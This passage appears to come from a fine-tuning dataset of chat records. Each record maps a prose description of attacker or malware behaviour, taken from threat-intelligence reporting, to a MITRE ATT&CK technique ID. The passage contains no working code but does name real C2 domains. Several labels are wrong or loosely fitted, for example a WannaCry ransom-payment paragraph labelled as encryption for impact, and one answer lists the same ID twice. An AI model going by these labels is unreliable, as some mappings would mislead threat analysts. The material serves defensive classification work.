{ "role": "user", "content": "APT41 used compiled HTML (.chm) files for targeting." }, { "role": "assistant", "content": "T1218.001 - Signed Binary Proxy Execution: Compiled HTML File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It creates a socket, requests the address of the hardcoded C2 server \"win-restore.ru\" via gethostbyname() and connects to it. Thereafter, it also collects the volume serial number of C:\\ drive, the computer name and the hardware profile GUID. With this information, it creates the following string used by a subsequent send() function call" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MoonWind can delete itself or specified files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It’s clear from our research that the quality of the WannaCry code is poor and the developers made many mistakes, enabling many of those infected to recover encrypted data.  The way the attackers handled ransom payments limited their ability to capitalise on the spread of the worm.  Multiple attempts were made to track transactions to the bitcoin wallets used by the attackers.  Although estimates of how much money the attackers made vary, they run into tens of thousands, rather than hundreds ." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GALLIUM used a modified version of NBTscan to identify available NetBIOS name servers over the network as well as \"ping\" to identify remote systems." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Axiom has been observed using SQL injection to gain access to systems." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "S-Type has deleted files it has created on a compromised host." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encrypts C2 traffic using AES with a static key." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encrypts strings to make analysis more difficult." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After achieving access to staging targets, the threat actors installed tools to carry out operations against intended victims. On one occasion, threat actors installed the free version of FortiClient, which they presumably used as a VPN client to connect to intended target networks" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Micropsia uses HTTP and HTTPS for C2 network communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 used batch scripts to enumerate administrators and users in the domain." }, { "role": "assistant", "content": "T1069.002 - Permission Groups Discovery: Domain Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sliver can upload files from the C2 server to the victim machine using the \"upload\" command." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In most systems compromised by Kobalos, the SSH client is compromised to steal credentials. This credential stealer is unlike any of the malicious OpenSSH clients we’ve seen before, and we’ve looked at tens of them in the past eight years. The sophistication of this component is not the same as Kobalos itself: there was no effort to obfuscate early variants of the credential stealer. However, we found newer variants that contain some obfuscation and the ability to exfiltrate credentials over the network" }, { "role": "assistant", "content": "T1048 - Exfiltration Over Alternative Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The process begins with the consistent execution of a malicious DLL using the legitimate regsvr32.exe Windows Utility. Once executed, the DLL is deleted from the system and its components are dropped to the system" }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nerex drops a signed Microsoft DLL to disk." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bankshot modifies the time of a file as specified by the control server." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SDBbot can enumerate a list of running processes on a compromised machine." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "USBferry can detect the infected machine's network topology using \"ipconfig\" and \"arp\"." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can change Internet Explorer settings to reduce warnings about malware activity." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Of note, we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon. Cannon uses SMTPS and POP3S as its C2 channel compared to Zebrocy that uses a more commonly observed HTTP or HTTPS based C2. Add the layer of encryption that the SMTPS and POP3S protocols provide to the legitimate web-based service and you have a very difficult C2 channel to block" }, { "role": "assistant", "content": "T1071.003 - Mail Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can uninstall malware components using a batch script. Additionally, a malicious Word document used for delivery uses VBA macros for execution." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bonadan has maliciously altered the OpenSSH binary on targeted systems to create a backdoor." }, { "role": "assistant", "content": "T1554 - Compromise Host Software Binary" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "copies itself to the Startup folder to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ComRAT has used a task name associated with Windows SQM Consolidator." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkWatchman has been observed deleting its original launcher after installation." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Koadic can scan for open TCP ports on the target network." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carberp has removed various hooks before installing the trojan or bootkit to evade sandbox analysis or other analysis software." }, { "role": "assistant", "content": "T1497 - Virtualization/Sandbox Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kazuar gathers information on the system and local drives." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WannaCry attempts to copy itself to remote computers after gaining access via an SMB exploit." }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used cmd.exe to launch commands on the victim’s machine." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Skidmap has monitored critical processes to ensure resiliency." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cisco Talos has observed another malware campaign that utilizes malicious Microsoft Office documents (maldocs) to spread the remote access trojan (RAT) ObliqueRAT. ObliqueRAT has been linked to the Transparent Tribe APT group in the past" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The command does not attempt to kill the specific Office process that would load the particular delivery document, such as Excel in the case of this “.xlam” file, but instead attempts to kill processes associated with Word, Excel, PowerPoint and Publisher" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The analysis of the tools and techniques used in the Astaroth campaign show how truly effective LOLbins are at evading antivirus products" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent Tesla can collect account information from the victim’s machine." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can leverage its implementation of Mimikatz to obtain and use golden tickets." }, { "role": "assistant", "content": "T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attackers used both families concurrently from late last year through November 2017 and there is some C2 infrastructure overlap between the two families, as well as links to historical reporting. Reaver Malware Analysis To date, Palo Alto Networks Unit 42 has identified 10 unique samples and three distinct variants of a new malware family we have named “Reaver”. As such, we identify each variant as Reaver.v1, Reaver.v2, and Reaver.v3. Reaver.v1 has been observed delivering a payload that uses HTTP for network communication, while versions 2 and 3 use a payload that uses raw TCP connections for this communication. The flow for Reaver is as shown" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols', 'T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SslMM contains a feature to manipulate process privileges and tokens." }, { "role": "assistant", "content": "T1134 - Access Token Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 used a compromised account to create a scheduled task on a system." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "executes using PowerShell and can also perform pass-the-ticket and use Lazagne for harvesting credentials." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gh0st RAT has checked for the existence of a Service key to determine if it has already been installed on the system." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JHUHUGIT uses a .bat file to execute a .dll." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HiddenWasp uses an RC4-like algorithm with an already computed PRGA generated key-stream for network communication." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses PowerShell for execution." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SilverTerrier uses HTTP for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrifeWater can collect data from a compromised host." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This hardens the encryption of the network communication, as a single RC4 key will not decrypt the entire payload. Leverages existing Windows registry key that is enabled by default in Windows 10 to store configuration data. Generates unique session keys for each connection to the C2 server. Employs polymorphic code, changing its runtime footprint during code execution to thwart memory analysis and evade signaturing. Encrypts or decrypts function blocks (code blocks) during runtime, as needed, to evade detection. Uses position independent code (PIC) to throw off static analysis tools" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kasidet can execute commands using cmd.exe." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tasklist can be used to enumerate security software currently running on a system by process name of known products." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The file named ‘lsass.exe’ was downloaded from win10-update[.]com via an HTTP request. The win10-update[.]com domain has been noted in open source as an indicator associated with Chafer threat operations. The lsass.exe file downloaded from this domain is a previously unreported python-based payload that we are currently tracking as MechaFlounder. We believe Chafer uses MechaFlounder as a secondary payload that the group downloads from a first-stage payload to carry out its post-exploitation activities on the compromised host" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SMOKEDHAM has exfiltrated data to its C2 server." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As seen in the above request, the Trojan will generate a URL for its beacon with the following structure:http:///chk? The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. One example of a web shell deployed by HAFNIUM, written in ASP, is below" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This can potentially bypass application whitelisting since all processes spawned during the attack are legitimate Microsoft executables" }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling has the ability to set its file attributes to hidden." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HOPLIGHT has modified the firewall using netsh." }, { "role": "assistant", "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Egregor can perform a long sleep (greater than or equal to 3 minutes) to evade detection." }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After Comnie has been copied to the %TEMP% directory, it will look for the presence of the ‘DQuit.tmp’ file in this path" }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified web page." }, { "role": "assistant", "content": "T1185 - Browser Session Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DownPaper communicates to its C2 server over HTTP." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "executes commands remotely via cmd.exe." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Later, the attackers are observed executing an HTA file hosted on a remote server by abusing mshta.exe via depended.exe. The Mshta utility can execute Microsoft HTML Application (HTA) files and can be abused to bypass application control solutions. Since mshta.exe executes outside of Internet Explorer's security context, it also bypasses browser security settings" }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lateral movement can be done with Net through \"net use\" commands to connect to the on remote systems." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The generated buffer is encoded using the BASE64 alphabet to be sent in the POST request" }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "hides any strings related to its own indicators of compromise." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aria-body has the ability to execute a process using \"runas\"." }, { "role": "assistant", "content": "T1134.002 - Create Process with Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If no exceptions occur, the Windows executable drops a DLL file in the user's AppData\\Local\\Temp\\ directory, creates a randomly-named folder under C:\\ProgramData\\ directory and moves the DLL under that folder as a random file name. This Redaman DLL is made persistent through a scheduled Windows task with the following properties" }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gh0st RAT can load DLLs into memory." }, { "role": "assistant", "content": "T1129 - Server Software Component" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Trojan.Karagany can monitor the titles of open windows to identify specific keywords." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "11 AV detection If there is no Avast install present, the script proceeds to the final .dll execution using regsvr32 and quits" }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sys10 collects the local IP address of the victim and sends it to the C2." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoisonIvy creates a backdoor through which remote attackers can steal system information." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cannon can download a payload for execution." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 used the \"Get-AcceptedDomain\" PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell. They also used AdFind to enumerate domains and to discover trust between federated domains." }, { "role": "assistant", "content": "T1482 - Domain Trust Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware has created scheduled tasks to establish persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first of FIN7's new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators" }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FoggyWeb's loader can check for the FoggyWeb backdoor .pri file on a compromised AD FS server." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For instance, the following data exists within a resource: fb 70 b0 c9 bd c5 8a d4 0c 54 fd 4c 6d bb f0 0f By multiplying each byte with -1, we obtain the following data: 05 90 50 37 43 3b 76 2c f4 ac 03 b4 93 45 10 f1 After using RC4 and the key 14331d289e737093994395d3fc412afc, the following cleartext data appears: \\x00\\x00\\x00\\x00FlashRun.vbs We do not see the payload using this FlashRun.vbs filename, instead it uses a temporary file name to store an embedded VBScript file, such as %Temp%\\4.tmp\\5.vbs" }, { "role": "assistant", "content": "T1036 - Masquerading', 'T1064 - Scripting', 'T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RCSession has the ability to drop additional files to an infected machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CARROTBAT itself is a dropper that allows an attacker to drop and open an embedded decoy file, followed by the execution of a command that will download and run a payload on the targeted machine" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Given Lazarus’ use of a wide array of tools and techniques in their operations, it’s reasonable to assume that the group will continue to use ever-evolving tactics in their malicious activities. Overall, an organization will need multilayered security strategies, as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses" }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It will: Download and execute the backdoor component Replace the content of the downloader Mach-O executable with a decoy, either using a base64-encoded embedded file or by downloading it from the internet 